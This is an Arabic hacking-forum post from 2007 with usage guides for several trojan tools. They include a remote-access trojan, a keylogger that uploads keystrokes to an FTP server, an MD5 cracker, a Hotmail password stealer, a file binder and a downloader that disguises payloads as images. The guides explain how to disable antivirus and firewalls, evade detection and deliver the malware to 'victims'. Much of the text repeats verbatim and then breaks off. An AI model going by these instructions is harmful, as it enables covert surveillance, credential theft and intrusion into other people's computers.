!!محيي تيتو!!
06-09-2007, 10:18 AM
النهارده هنبتدي دروس عن الهاك و الكلام المؤذي ده
طبعا مش هكرر كلام اتقال قبل كده و اقول يعني ايه اختراق و يعني ايه اي بي و يعني ايه بورت , اكيد كلكو عارفين الحجات دي بس عاوزين تطبقو عملي و انا هنا عشان كده [Link nur für registrierte Benutzer sichtbar]
ملحوظة : لو عاوز تتعلم هاك صح عليك بالمواقع الاجنبي هتلاقي دايما فيها قسم للمبتدئين فيه مقالات كتيرعن الهاكينج و الكراكينج و التشفير و البرمجة حاول تقراها على قد ما تقدر و خليك فاكر the more you read the more you learn
بس احنا هنبتدي النهارده بالبرامج العربي كبداية بس للي ميعرفوش اي حاجة عن الموضوع
البرنامج الاول
المقرصن
اضغط هنا للتحميل
الشرح
وظيفة البرنامج: ارسال الملفات من والى جهاز الضحية مع تصفح كامل لملفاته .
حجم التروجان: 44 كيلو بايت تقريبا وبعد الضغط بالـ UPX يصبح 20 كيلو بايت تقريبا.
الأنظمة التي يعمل السيرفر عليها: يعمل على جميع اصدارات ويندوز.
مواصفات البرنامج و المميزات والتحسينات:ا
1- استخدام تقنية تخطي الشبكات وهذا اول برنامج عربي باعتقادي يستخدم لهذه التقنية
وهي تساعدك في اختراق اجهزة مقاهي الانترنت والجامعات او الشركات...الخ وانت خارج الشبكة.
2- عدم استخدام طريقة الـ S.I.N باعتماد على موقع no-ip.com في عملية تخطي الشبكات بل طريقة جديدة تسهل على المسخدم تخطي الشبكات وهذا اول برنامج عربي يستخدمها وايضا اول برنامج على مستوى البرامج الأجنبية باعتقادي تستخدم هذه الطريقة اذ ان جميع البرامج الأجنبية تعتمد على الـ S.I.N عن طريق موقع no-ip.com.
3- استخدام تقنية الملفات المساعدة بحيث تستطيع برمجة ملف مساعد بنفسك وارساله للضحية
وتشغيل الامر الذي به.
4- عمل الكثير من التعديلات البرمجية وحل بعض المشاكل البرمجية التي كانت في الاصدار الأول من البرنامج.
5- الابلاغ بطريقتين اما عن طريق البريد او عن طريق الـ PHP.
6- استخدام تقنية تشفير البيانات حيث لا تستطيع رؤية البيانات باستخدام برامج ال hex
بحيث لا تستطيع الضحية رؤية اي معلومات عن التروجان كعنوان بريدك المخزن او رابط موقعك.
7- لا تحتاج لأن تكتب سيرفر البريد في البرنامج فقط ضع بريدك وسوف يقوم السيرفر بالباقي
ويعمل مع اي بريد هوتميل او ياهو .....الخ.
8- يوجد خيار ضغط السيرفر بالـ UPX تلقائيا حتى لو كنت لا تعرف كيف تستخدم الـ UPX.
9- غير مكتشف من قبل برامج الحماية حتى الآن.
شرح فكرة البرنامج:
فكرة البرنامج هي نقل الملفات من والى جهاز الضحية عن طريق موقع تضع فيه الملف الذي تريد ان تحمله الى جهاز الضحية ومن ثم تصدر امر التحميل اما بالنسبة لرفع ملف من جهاز الضحية الى جهازك فيتم ارسال الملف الى موقعك (حساب الـ FTP) عن طريق البيانات التي وضعتها في السيرفر بمعنى اخر لا يوجد اتصال مباشر بينك وبين الضحية اثناء نقل الملفات.
شرح البرنامج:
اولا عند فك ضغط البرنامج سوف ترى ثلاث ملفات وهي:
المقرصن2: وهو البرنامج الرئيسي.
file.php : وهو الملف الخاص بالتبليغ عن طريق ال PHP.
upx.exe : وهو برنامج لضغط الملفات.
اولا قم بفتح برنامج المقرصن2 ثم اضغط على اعدادات الخادم ثم اختر نوع الخادم الذي تريده وغير البيانات كما يلي:
اسم السيرفر: اكتب اي اسم تريد وهذا اسم السيرفر بعدما ينسخ نفسه في احد المجلدين الذي تختاره.
اسم الرجستري: اكتب اي اسم تريد وهو الاسم الذي يظهر في الرجستري .
المنفذ: اكتب اي منفذ يعجبك وينصح ان يكون المنفذ غير معروف (مشهور) غير معروف لكي لا يتعارض مع نفس المنفذ اذا كانت هناك برامج اخرى تستخدم نفس المنفذ.
اسم الضحية: اكتب اي اسم تريد لكي تستطيع ان تفرق بين ضحاياك.
موقع السيرفر: هنا تختار اين ينسخ السيفر نفسه اما في مجلد الويندوز او مجلد السيستم.
قتل برامج الحماية: هذا الخيار يغلق لك برامج الانتي فايروس وبرامج الفايروول (الحائط الناري).
قتل جدا النار الخاص لـ xp : هذا الخيار سوف يقوم بايقاف جدار النار الخاص بويندوز اكس بي.
حذف برنامج الـ Regedit.exe : هذا الخيار يقوم بحذف برنامج ال Regedit الذي يقوم بتصفح الرجستري.
الضغط بواسطة ال UPX: هذا الخيار ييقوم بضغط ملف السيرفر بواسطة ال UPX.
الايقونة: اضغط على الزر ومن ثم اختر ايقونة السيرفر.
سيرفر الـ FTP : اكتب هنا سيرفر الـFTP الخاص لموقعك مثال لسيرفر الـ lycos:
ftp.members.lycos.co.uk
اسم المستخدم: اكتب هنا اسم المستخدم الخاص للـ FTP لموقعك.
كلمة المرور: اكتب نا كلمة المرور الخاص للـ FTP لموقعك.
عنوان بريدك: اكتب بريدك كاملا مثلا : yourmail@hotmail.com (yourmail@hotmail.com)
رابط الملف: اكتب هنا رابط ملف ال PHP الموجود على موقعك.
بعد ذلك اضغط على حفظ الملف وسوف ترى ملف جديد في مجلد البرنامج اسمه server.exe وهو ملف السيرفر الذي ترسله للضحية.
ملاحظات:
- عند الاتصال بالضحية تستطيع رؤية ملفاته عن طريق اختيار السواقة وتستطيع فتح المجلدات عن طريق الضغط مرتين على المجلد.
لرفع الملفات من والى جهاز الضحية اضغط على الملف او قائمة الملفات بالزر الايمن وسوف تظهر لك قائمة اختر منها الامر الذي تريد تنفيذه.
- عند الاتصال بالضحية لا تقم باصدار عدة اوامر في وقت واحد قم باصدار امر واحد ثم انتظر حتى ينتهي ومن ثم اصدر الامرالذي بعده.
-اثناء نقل الملفات لا تقم باصدار اي امر اخر حتى تظهر لك رسالة انهاء نقل الملف ومن بعدها اصدر الاوامر الاخرى.
- بالنسبة للابلاغ عن طريق ال php فقط ضع ملف ال php المرفق مع البرنامج في موقعك واكتب رابط الموقع بشكل جيد في البرنامج مثال:
[Link nur für registrierte Benutzer sichtbar] ([Link nur für registrierte Benutzer sichtbar])
وبعدها اذا دخلت الضحية الانترنت سوف يتم تكوين ملف اسمه log.html ويتم فيه تخزين بيانات الضحية فقط قم بفحص الملف log.html
[Link nur für registrierte Benutzer sichtbar] ([Link nur für registrierte Benutzer sichtbar])
- اما بالنسبة للابلاغ عن طريق البريد لا انصح المستخدمين الاعتماد الكلي عليها.
- عند اعداد خادم للشبكات يجب ان يكون رابط الملف الذي يأخذ منه الخادم الايبي بهذا الشكل او
ما شابهه:
[Link nur für registrierte Benutzer sichtbar] ([Link nur für registrierte Benutzer sichtbar])
بحيث تكتب في ملف ال Ip.txt ايبي جهازك فقط ولا تزيد عليه اي شئ وكل ما تدخل الانترنت غير الايبي الموجود في الملف لأن ايبيك سوف يتغير اذا كنت من مستخدمي الاتصال العادي.
- بالنسبة لخيار الانصات اختر رقم المنفذ الذي حددته في الخادم ثم اضغط على زر بدء الانصات
وتستطيع ان تتحكم باكثر من خادم يتصل بك في نفس الوقت كل ما عليك هو اختيار الايبي الموجود
في قائمة الايبيات المتصلة حتى تتحكم بالايبي المطلوب واكرر ذلك يجب عليك ان تختار الايبي الذي تريد ان تتحكم عليه لأنك لو لم تختر اي ايبي فلن ترسل الاوامر للخادم.
- بالنسبة لمن يريد عمل ملف مساعد خاص به يستخدمه مع الخادم فهذا مثال على الدلفي
سوف يفيد المبرمجين في ذلك:
library Project1;
uses
windows;
procedure test; stdcall;
begin
messagebox(0,'any****','your title',mb_ok);
end;
exports
test;
begin
end.
حيث يجب ان تكون اسم الاجرائية test لأن البرنامج مبرمج بهذا الاسم.
البرنامج الثاني
الكاسر
اضغط هنا للتحميل
الشرح
وظيفة البرنامج: كسر كلمات سر الـ (md5) المشفرة .
مواصفات البرنامج :ا
1- تجربة الف كلمة في الدقيقة تقريبا وهذا يعني عشرة الاف كلمة في عشر دقائق
وهذا يعني مائة الف كلمة في الساعة يعني مليون كلمة في اليوم.
2- عند البد بعملية الكسر ليس هناك تأثير كبير على الجهاز بهذا تستطيع استخدامه
وانت تعمل على اشياء اخرى (التجربة خير برهان).
3- كشف اي كلمة سر مهما كانت صعوبتها مادام كان موجودا في قائمة الكلمات التي يجربها.
4- اقصى حد لقائمة الكلمات هي 32000 كلمة .
5- يوجد عداد يخبرك بالكلمات المتبقية التي لم يتم تجربتها.
6- تيستطيع وقف عملية الكسر في اي وقت شئت.
شرح فكرة البرنامج:
فكرة البرنامج هي تخمين كلمات السر حتى تطابق كلمة السر المشفرة وهذا يعتمد على الكلمات
التي وضعتها في القائمة.
شرح البرنامج:
اولا عند فك ضغط البرنامج :
افتح البرنامج وضع في خانة كلمة السر المشفرة الباسوورد المشفر
وبعد ذلك اضغط على تحميل الكلمات واختر الملف الذي به الكلمات ثم
اضغط على زر بدء عملية كسر كلمة السر وانتظر حتى يكسر كلمة السر واذا كسر سوف تظهر
لك رسالة تخبرك بذلك وتظهر كلمة السر في خانة كلمة السر.
ملاحظات:
- عند تحميل الكلمات ضعها في ملف من نوع txt ثم حملها.
- للحصول على قائمة للكلمات يوجد الكثير من البرامج التي تقوم بذلك حيث تجهز لك
كلمات كثيرة اما اذا احببت ان تجهز قائمتك فلك ذلك او انك تبحث عن قائمة الكلمات في الانترنت .
مثال تجريبي:
افتح البرنامج وضع هذا الباسوورد المشفر:
e10adc3949ba59abbe56e057f20f883e
افتح وحمل قائمة الكلمات وضع من ضمنها الرقم 123456
لأنها هي كلمة السر قبل التشفيير وابدأ عملية الكسر وانظر للنتيجة.
البرنامج الثالث
قناص الكيبورد
اضغط هنا للتحميل
الشرح
وظيفة البرنامج: التجسس على لوحة المفاتيح وتسجيل كل ما تكتبه الضحية ثم ارسالها لك.
حجم التروجان: 37 كيلو بايت وبعد الضغط بال UPX يصبح 18 كيلو بايت تقريبا.
الأنظمة التي يعمل السيرفر عليها: يعمل على جميع اصدارات ويندوز.
مواصفات البرنامج و السيرفر:ا
1- ارسال الكتابات المسجلة عن طريق الـ FTP ويعني ذلك انه لا داعي من القلق من مساحة الكتابات.
2- استخدام تقنية تشفير البيانات حيث لا تستطيع رؤية البيانات حتى باستخدام برامج ال hex
بحيث لا تستطيع الضحية رؤية اي معلومات عن التروجان كاسم مستخدم موقعك وكلمة سره المخزن او رابط سيرفر الـ FTP.
3- التروجان لا يتوقف عن التسجيل عند وصول حجم الكتابات الى حجم معين وهذا يعني انه يسجل كل شئ تكتبه الضحية.
4- يوجد خيار ضغط السيرفر بالـ UPX تلقائيا حتى لو كنت لا تعرف كيف تستخدم الـ UPX.
شرح البرنامج:
اولا عند فك ضغط البرنامج سوف ترى ثلاث ملفات وهي:
قناص الكيبورد2: وهو البرنامج الرئيسي.
server.svr : وهو الملف المساعد لتكوين السيرفر.
upx.exe : وهو برنامج لضغط الملفات.
اول شئ تقوم بالضغط على زر قراءة الملف ثم اختر الملف server.svr وبعد ذلك غير البيانات كما يأتي:
اسم السيرفر: اكتب اي اسم تريد وهذا اسم السيرفر بعدما ينسخ نفسه في احد المجلدين الذي تختاره.
اسم الرجستري: اكتب اي اسم تريد وهو الاسم الذي يظهر في الرجستري .
اسم الضحية: اكتب اي اسم تريد لكي تستطيع ان تفرق بين ضحاياك.
موقع السيرفر: هنا تختار اين ينسخ السيفر نفسه اما في مجلد الويندوز او مجلد السيستم.
قتل برامج الحماية: هذا الخيار يغلق لك برامج الانتي فايروس وبرامج الفايروول (الحائط الناري).
الضغط بواسطة ال UPX : هذا الخيار ييقوم بضغط ملف السيرفر بواسطة ال UPX.
سيرفر الـ FTP : اكتب هنا سيرفر الـ FTP الخاص لحسابك مثال لسيرفر موقع Lycos
المجاني : ftp.members.lycos.co.uk
اسم المستخدم: اكتب هنا اسم المستخدم الخاص للدخول على حسابك على سيرفر الـ FTP .
كلمة السر: اكتب هنا كلمة السر الخاص للدخول على حسابك على سيرفر الـ FTP .
بعد ذلك اضغط على حفظ الملف وسوف ترى ملف جديد في مجل البرنامج اسمه server.exe وهو ملف السيرفر الذي ترسله للضحية.
ملاحظة:
- عندما يرسال السيرفر للكتابات على موقعكفانه يصل لك بهذا الشكل:
victim1.txt
victim2.txt
victim3.txt
victim*.txt
وهكذا....... اي ان ملف الكتابات تكون على اسم الضحية التي اخترتها باضافة رقم حتى لا يضيف السيرفر ملف الكتابات الجديدة على القديمة .
- يفضل قبل ارسال السيرفر الى الضحية القيام بتجربة سيرفر الـ FTP الخاص لموقعك وسوف يرسل
البرنامج الى موعك ملف باسم الضحية التي اخترتها على موقعك وتكون فارغة بهذا تستدل على ان
سيرفر الـ FTP يعمل جيدا والعكس صحيح.
البرنامج الرابع
المبلغ الالي
للتحميل اضغط هنا
الشرح
وظيفة البرنامج: التبليغ عن ان الضحية دخل الانترنت وارسال الايبي لك.
حجم التروجان: 50 كيلو بايت وبعد الضغط بال UPX يصبح 24 كيلو بايت تقريبا.
الأنظمة التي يعمل السيرفر عليها: يعمل على جميع اصدارات ويندوز.
مواصفات البرنامج و السيرفر:ا
1- الابلاغ بطريقتين اما عن طريق البريد او عن طريق الـ PHP.
2- استخدام تقنية تشفير البيانات حيث لا تستطيع رؤية البيانات باستخدام برامج ال hex
بحيث لا تستطيع الضحية رؤية اي معلومات عن التروجان كعنوان بريدك المخزن او رابط موقعك.
3- لا تحتاج لأن تكتب سيرفر البريد في البرنامج فقط ضع بريدك وسوف يقوم السيرفر بالباقي
ويعمل مع اي بريد هوتميل او ياهو .....الخ.
4- يوجد خيار ضغط السيرفر بالـ UPX تلقائيا حتى لو كنت لا تعرف كيف تستخدم الـ UPX.
شرح البرنامج:
اولا عند فك ضغط البرنامج سوف ترى ثلاث ملفات وهي:
المبلغ الآلي: وهو البرنامج الرئيسي.
server.dll : وهو الملف المساعد لتكوين السيرفر.
upx.exe : وهو برنامج لضغط الملفات.
اول شئ تقوم بالضغط على زر قراءة الملف ثم اختر الملف server.dll وبعد ذلك غير البيانات كما يأتي:
اسم السيرفر: اكتب اي اسم تريد وهذا اسم السيرفر بعدما ينسخ نفسه في احد المجلدين الذي تختاره.
اسم الرجستري: اكتب اي اسم تريد وهو الاسم الذي يظهر في الرجستري .
اسم الضحية: اكتب اي اسم تريد لكي تستطيع ان تفرق بين ضحاياك.
موقع السيرفر: هنا تختار اين ينسخ السيفر نفسه اما في مجلد الويندوز او مجلد السيستم.
قتل برامج الحماية: هذا الخيار يغلق لك برامج الانتي فايروس وبرامج الفايروول (الحائط الناري).
الضغط بواسطة ال UPX: هذا الخيار ييقوم بضغط ملف السيرفر بواسطة ال UPX.
عنوان بريدك: اكتب بريدك كاملا مثلا : yourmail@hotmail.com (yourmail@hotmail.com)
رابط الملف: اكتب هنا رابط ملف ال PHP الموجود على موقعك.
بعد ذلك اضغط على حفظ الملف وسوف ترى ملف جديد في مجل البرنامج اسمه server.exe وهو ملف السيرفر الذي ترسله للضحية.
ملاحظة:
بالنسبة للابلاغ عن طريق ال php فقط ضع ملف ال php المرفق مع البرنامج في موقعك واكتب رابط الموقع بشكل جيد في البرنامج مثال:
[Link nur für registrierte Benutzer sichtbar] ([Link nur für registrierte Benutzer sichtbar])
وبعدها اذا دخلت الضحية الانترنت سوف يتم تكوين ملف اسمه log.txt ويتم فيه تخزين بيانات الضحية فقط قم بفحص الملف log.txt
[Link nur für registrierte Benutzer sichtbar] ([Link nur für registrierte Benutzer sichtbar])
اما بالنسبة للابلاغ عن طريق البريد فسوف تأتيك رسالة من Nobody وبها الايبي وانصح المستخدمين
اذا استخدموا الابلاغ عن طريق البريد الا يستخدموا بريد الهوتميل وانما يستخدموا اي بريد اخر.
البرنامج الخامس
قاتل الهوتميل
اضغط هنا للتحميل
الشرح
وظيفة البرنامج: سرقة كلمة سر البريد
أرجو عدم استخدامه ضد المسلمين مع أني متأكد ان أغلبكم سوف يقوم بذلك (كل واحد وضميره)
الشرح:
اولا: قم بكتابة بريد الضحية من غير @hotmail.com .
ثانيا: اكتب بريدك كاملا.
ثالثا: املأ بيانات الارسال.
رابعا: اضغط على ارسال البريد.
ملاحظات:
1- جرب استخدام البرنامج عى نفسك لكي تتعلم كيف تتعامل معه.
2- لا يشترط ان يكون بريدك على الهوتميل تستطيع كتابة اي بريد لك عل اي سيرفر.
3- الرسالة التي تأتيك تكون من Nobody وفي موضوع الرسالة بريد الضحية
وداخل الرسالة كلمة سر الضحية.
4- عند كتابة بريد المرسل يفضل كتابة اي بريد ولكن لا ينتهي ب @hotmail.com
لأنه لو انتهى به فلن تصل الراسلة في اغلب الاحيان لذا دع نهاية البريد اي سيرفر غير الهوتميل مثال
victim@yahoo.com (victim@yahoo.com)
5- ارسل الراسلة اكثر من مرة على الاقل مرتين لكي تتأكد من انها رسلت.
6- انتظر بعض الوقت لكي يتم ارسا الرسالة بشكل ناجح.
البرنامج السادس
الدامج
للتحميل اضغط هنا
الشرح
وظيفة البرنامج: دمج الملفات
الشرح:
اولا: قم بفك ضغط البرنامج لأنك لو فتحت البرنامج وهو مضغوط سوف تظهر لك رسالة
خطأ تنبهك بعدم وجود هذا الملف bsj.dll .
ثانيا: اضغط على اضافة ملف لكي تضيف الملفات المراد دمجها.
ثالثا: اختر امتداد الملف وهو امتداد الملف الناتج الذي يحتوي على الملفات التي اردت دمجها.
رابعا: اضغط على دمج الملفات وسوف يظهر في مجلد البرنامج ملف باسم file وهو الملف المدموج.
ملاحظة: البرناج لا يقتصر على دمج ملفين فقط ب اكثر من ذلك.
البرنامج السابع
قناص التروجان
اضغط هنا للتحميل
الشرح
قبل ان ابدء بالشرح اود ان اوضح بعض الملاحظات المهمة جدا والا لن يعمل البرنامج:
عندما تحمل البرنامج سوف ترى ملف اسمه actskn43.ocx ضعه في مجلد ال System
وبعد ذلك اغضط على زر ابدء (Start) ثم اختر تشغيل (Run) وبعد ذلك اكتب هذا
الامر : regsvr32 actskn43.ocx واضغط enter.
سوف يظهر ك مربع يقول لك تم تخزين الملف في الرجستري.
وبهذا سوف يعمل البرنامج بشكل جيد.
اما بالنسبة لمن واجه مشكلة ظهور علامات الاستفهام في البرنامج فاليتبع هذه الخطوات:
اضغط على زر ابدء (Start) ثم اختر لوحة التحكم (Control Panel) وبعد ذلك
افتح Regional Settings لا أعرف ما اسمه بااعربي ولكن ايقونته عى شكل الكرة الارضية
وفي هذا البرامج تجد خيارات اللغة غير الخيار الى Arabic وسوف يطلب منك
اعادة تشغيل الجهاز وبعد ذلك شغل البرنامج ولن ترى علامات الاستفهام.
والان سوف ابدء بالشرح:
وظيفة البرنامج : تحميل التروجان من الانترنت وتشغيله على جهاز الضحية.
حجم التروجان:46 كيلو بايت وبعد الضغط بالـ upx يصبح 22 كيلو بايت.
مواصفات التروجان : لا يكتشفه اي انتي فايروس وبه خاصية قتل الانتي فايروس
والفايروول.
ملاحظة مهمة جدا: لن يعمل البرنامج الا اذا وضعت هذا الملف actskn43.ocx في مجلد السيستم.
الأنظمة التي يعمل عليها التروجان: يعمل مئة بالمئة على ويندوز 98 و ميلنيوم
وهنالك احتمال كبير ان يحمل على الاكس بي.
لم تتوفر لي الفرصة في تجربة البرنامج على الاكس فأرجو من جربة البرنامج والسيرفر
على الاكس او ويندوز 2000 يخبرني بالنتيجة.
شرح البرنامج:
عندما تفتح البرنامج اضغط على قراءة الملف واختر ملف السيرفر ثم انتظر حتى يقرأ البيانات
وبعد ذلك غير ما يلزم في البرنامج واضغط على حفظ الملف وسوف تتم عملية حفظ البيانات على
نفس ملف السيرفر وليس في ملف جديد وبعد ذلك ارسل السيرفر.
عندما تتم عملية قراءة البيانات غير البيانات كما يلزم اتبع هذه الخطوات:
أولا: في خانة موقع السيرفر: اكتب الموقع الذي تريد ان يتم فيه تحميل السيرفر الى
جهاز الضحية مثلا: [Link nur für registrierte Benutzer sichtbar] ([Link nur für registrierte Benutzer sichtbar])
ثانيا: خانة اسم السيرفر بعد التحميل: هنا تكتب اسم السيرفر وهذا الاسم
هو اسم السيرفر بعد تحميل السيرفر على جهاز الضحية مثال:
التروجان حمل السيرفر من هذا الموقع [Link nur für registrierte Benutzer sichtbar] ([Link nur für registrierte Benutzer sichtbar])
نرى ان اسم السيرفر هنا trojan.exe واذا غيرت اسمه في خانة اسم السيرفر بعد
التحميل وجعلته مثلا server فإن اسم السيرفر في جهاز الضحية تكون server.exe
وليس trojan.exe أرجو اني وضحت الفكرة.
والآن نأتي الى نقطة مهمة جدا وهي ان بعض المواقع المجانية لا تدعك بتحميل
الملفات التنفيذية على سيرفرها اي هذا الامتداد exe لذا مع هذا البرنامج
لن تواجه اي مشكلة في ذلك تستطيع ان تغير امتداد السيرفر الذي تضعط على موقعك
الى اي امتداد واكرر مرة اخرى الى اي امتداد
يعني ممكن تجعله jpg او bmp او h او abcd أي امتداد حتى لو كان غير معروف
مهما كان الامتداد تستطيع تجعل الامتداد امتداد صورة....الخ وبذلك
تستطيع تحميل السيرفر الى الموقع المجاني لأن التروجان عندما ينتهي من تحميل
السيرفر الى جهاز الضحية يقوم بتغيير امتداده الى exe ثم يفتحه
ولتغيير الامتداد لا تستخدم البرامج لذلك استخدم الدوس هذا الامر:
rename server.exe server.jpg
طبعا مش هكرر كلام اتقال قبل كده و اقول يعني ايه اختراق و يعني ايه اي بي و يعني ايه بورت , اكيد كلكو عارفين الحجات دي بس عاوزين تطبقو عملي و انا هنا عشان كده [Link nur für registrierte Benutzer sichtbar]
ملحوظة : لو عاوز تتعلم هاك صح عليك بالمواقع الاجنبي هتلاقي دايما فيها قسم للمبتدئين فيه مقالات كتيرعن الهاكينج و الكراكينج و التشفير و البرمجة حاول تقراها على قد ما تقدر و خليك فاكر the more you read the more you learn
بس احنا هنبتدي النهارده بالبرامج العربي كبداية بس للي ميعرفوش اي حاجة عن الموضوع
البرنامج الاول
المقرصن
اضغط هنا للتحميل
الشرح
وظيفة البرنامج: ارسال الملفات من والى جهاز الضحية مع تصفح كامل لملفاته .
حجم التروجان: 44 كيلو بايت تقريبا وبعد الضغط بالـ UPX يصبح 20 كيلو بايت تقريبا.
الأنظمة التي يعمل السيرفر عليها: يعمل على جميع اصدارات ويندوز.
مواصفات البرنامج و المميزات والتحسينات:ا
1- استخدام تقنية تخطي الشبكات وهذا اول برنامج عربي باعتقادي يستخدم لهذه التقنية
وهي تساعدك في اختراق اجهزة مقاهي الانترنت والجامعات او الشركات...الخ وانت خارج الشبكة.
2- عدم استخدام طريقة الـ S.I.N باعتماد على موقع no-ip.com في عملية تخطي الشبكات بل طريقة جديدة تسهل على المسخدم تخطي الشبكات وهذا اول برنامج عربي يستخدمها وايضا اول برنامج على مستوى البرامج الأجنبية باعتقادي تستخدم هذه الطريقة اذ ان جميع البرامج الأجنبية تعتمد على الـ S.I.N عن طريق موقع no-ip.com.
3- استخدام تقنية الملفات المساعدة بحيث تستطيع برمجة ملف مساعد بنفسك وارساله للضحية
وتشغيل الامر الذي به.
4- عمل الكثير من التعديلات البرمجية وحل بعض المشاكل البرمجية التي كانت في الاصدار الأول من البرنامج.
5- الابلاغ بطريقتين اما عن طريق البريد او عن طريق الـ PHP.
6- استخدام تقنية تشفير البيانات حيث لا تستطيع رؤية البيانات باستخدام برامج ال hex
بحيث لا تستطيع الضحية رؤية اي معلومات عن التروجان كعنوان بريدك المخزن او رابط موقعك.
7- لا تحتاج لأن تكتب سيرفر البريد في البرنامج فقط ضع بريدك وسوف يقوم السيرفر بالباقي
ويعمل مع اي بريد هوتميل او ياهو .....الخ.
8- يوجد خيار ضغط السيرفر بالـ UPX تلقائيا حتى لو كنت لا تعرف كيف تستخدم الـ UPX.
9- غير مكتشف من قبل برامج الحماية حتى الآن.
شرح فكرة البرنامج:
فكرة البرنامج هي نقل الملفات من والى جهاز الضحية عن طريق موقع تضع فيه الملف الذي تريد ان تحمله الى جهاز الضحية ومن ثم تصدر امر التحميل اما بالنسبة لرفع ملف من جهاز الضحية الى جهازك فيتم ارسال الملف الى موقعك (حساب الـ FTP) عن طريق البيانات التي وضعتها في السيرفر بمعنى اخر لا يوجد اتصال مباشر بينك وبين الضحية اثناء نقل الملفات.
شرح البرنامج:
اولا عند فك ضغط البرنامج سوف ترى ثلاث ملفات وهي:
المقرصن2: وهو البرنامج الرئيسي.
file.php : وهو الملف الخاص بالتبليغ عن طريق ال PHP.
upx.exe : وهو برنامج لضغط الملفات.
اولا قم بفتح برنامج المقرصن2 ثم اضغط على اعدادات الخادم ثم اختر نوع الخادم الذي تريده وغير البيانات كما يلي:
اسم السيرفر: اكتب اي اسم تريد وهذا اسم السيرفر بعدما ينسخ نفسه في احد المجلدين الذي تختاره.
اسم الرجستري: اكتب اي اسم تريد وهو الاسم الذي يظهر في الرجستري .
المنفذ: اكتب اي منفذ يعجبك وينصح ان يكون المنفذ غير معروف (مشهور) غير معروف لكي لا يتعارض مع نفس المنفذ اذا كانت هناك برامج اخرى تستخدم نفس المنفذ.
اسم الضحية: اكتب اي اسم تريد لكي تستطيع ان تفرق بين ضحاياك.
موقع السيرفر: هنا تختار اين ينسخ السيفر نفسه اما في مجلد الويندوز او مجلد السيستم.
قتل برامج الحماية: هذا الخيار يغلق لك برامج الانتي فايروس وبرامج الفايروول (الحائط الناري).
قتل جدا النار الخاص لـ xp : هذا الخيار سوف يقوم بايقاف جدار النار الخاص بويندوز اكس بي.
حذف برنامج الـ Regedit.exe : هذا الخيار يقوم بحذف برنامج ال Regedit الذي يقوم بتصفح الرجستري.
الضغط بواسطة ال UPX: هذا الخيار ييقوم بضغط ملف السيرفر بواسطة ال UPX.
الايقونة: اضغط على الزر ومن ثم اختر ايقونة السيرفر.
سيرفر الـ FTP : اكتب هنا سيرفر الـFTP الخاص لموقعك مثال لسيرفر الـ lycos:
ftp.members.lycos.co.uk
اسم المستخدم: اكتب هنا اسم المستخدم الخاص للـ FTP لموقعك.
كلمة المرور: اكتب نا كلمة المرور الخاص للـ FTP لموقعك.
عنوان بريدك: اكتب بريدك كاملا مثلا : yourmail@hotmail.com (yourmail@hotmail.com)
رابط الملف: اكتب هنا رابط ملف ال PHP الموجود على موقعك.
بعد ذلك اضغط على حفظ الملف وسوف ترى ملف جديد في مجلد البرنامج اسمه server.exe وهو ملف السيرفر الذي ترسله للضحية.
ملاحظات:
- عند الاتصال بالضحية تستطيع رؤية ملفاته عن طريق اختيار السواقة وتستطيع فتح المجلدات عن طريق الضغط مرتين على المجلد.
لرفع الملفات من والى جهاز الضحية اضغط على الملف او قائمة الملفات بالزر الايمن وسوف تظهر لك قائمة اختر منها الامر الذي تريد تنفيذه.
- عند الاتصال بالضحية لا تقم باصدار عدة اوامر في وقت واحد قم باصدار امر واحد ثم انتظر حتى ينتهي ومن ثم اصدر الامرالذي بعده.
-اثناء نقل الملفات لا تقم باصدار اي امر اخر حتى تظهر لك رسالة انهاء نقل الملف ومن بعدها اصدر الاوامر الاخرى.
- بالنسبة للابلاغ عن طريق ال php فقط ضع ملف ال php المرفق مع البرنامج في موقعك واكتب رابط الموقع بشكل جيد في البرنامج مثال:
[Link nur für registrierte Benutzer sichtbar] ([Link nur für registrierte Benutzer sichtbar])
وبعدها اذا دخلت الضحية الانترنت سوف يتم تكوين ملف اسمه log.html ويتم فيه تخزين بيانات الضحية فقط قم بفحص الملف log.html
[Link nur für registrierte Benutzer sichtbar] ([Link nur für registrierte Benutzer sichtbar])
- اما بالنسبة للابلاغ عن طريق البريد لا انصح المستخدمين الاعتماد الكلي عليها.
- عند اعداد خادم للشبكات يجب ان يكون رابط الملف الذي يأخذ منه الخادم الايبي بهذا الشكل او
ما شابهه:
[Link nur für registrierte Benutzer sichtbar] ([Link nur für registrierte Benutzer sichtbar])
بحيث تكتب في ملف ال Ip.txt ايبي جهازك فقط ولا تزيد عليه اي شئ وكل ما تدخل الانترنت غير الايبي الموجود في الملف لأن ايبيك سوف يتغير اذا كنت من مستخدمي الاتصال العادي.
- بالنسبة لخيار الانصات اختر رقم المنفذ الذي حددته في الخادم ثم اضغط على زر بدء الانصات
وتستطيع ان تتحكم باكثر من خادم يتصل بك في نفس الوقت كل ما عليك هو اختيار الايبي الموجود
في قائمة الايبيات المتصلة حتى تتحكم بالايبي المطلوب واكرر ذلك يجب عليك ان تختار الايبي الذي تريد ان تتحكم عليه لأنك لو لم تختر اي ايبي فلن ترسل الاوامر للخادم.
- بالنسبة لمن يريد عمل ملف مساعد خاص به يستخدمه مع الخادم فهذا مثال على الدلفي
سوف يفيد المبرمجين في ذلك:
library Project1;
uses
windows;
procedure test; stdcall;
begin
messagebox(0,'any****','your title',mb_ok);
end;
exports
test;
begin
end.
حيث يجب ان تكون اسم الاجرائية test لأن البرنامج مبرمج بهذا الاسم.
البرنامج الثاني
الكاسر
اضغط هنا للتحميل
الشرح
وظيفة البرنامج: كسر كلمات سر الـ (md5) المشفرة .
مواصفات البرنامج :ا
1- تجربة الف كلمة في الدقيقة تقريبا وهذا يعني عشرة الاف كلمة في عشر دقائق
وهذا يعني مائة الف كلمة في الساعة يعني مليون كلمة في اليوم.
2- عند البد بعملية الكسر ليس هناك تأثير كبير على الجهاز بهذا تستطيع استخدامه
وانت تعمل على اشياء اخرى (التجربة خير برهان).
3- كشف اي كلمة سر مهما كانت صعوبتها مادام كان موجودا في قائمة الكلمات التي يجربها.
4- اقصى حد لقائمة الكلمات هي 32000 كلمة .
5- يوجد عداد يخبرك بالكلمات المتبقية التي لم يتم تجربتها.
6- تيستطيع وقف عملية الكسر في اي وقت شئت.
شرح فكرة البرنامج:
فكرة البرنامج هي تخمين كلمات السر حتى تطابق كلمة السر المشفرة وهذا يعتمد على الكلمات
التي وضعتها في القائمة.
شرح البرنامج:
اولا عند فك ضغط البرنامج :
افتح البرنامج وضع في خانة كلمة السر المشفرة الباسوورد المشفر
وبعد ذلك اضغط على تحميل الكلمات واختر الملف الذي به الكلمات ثم
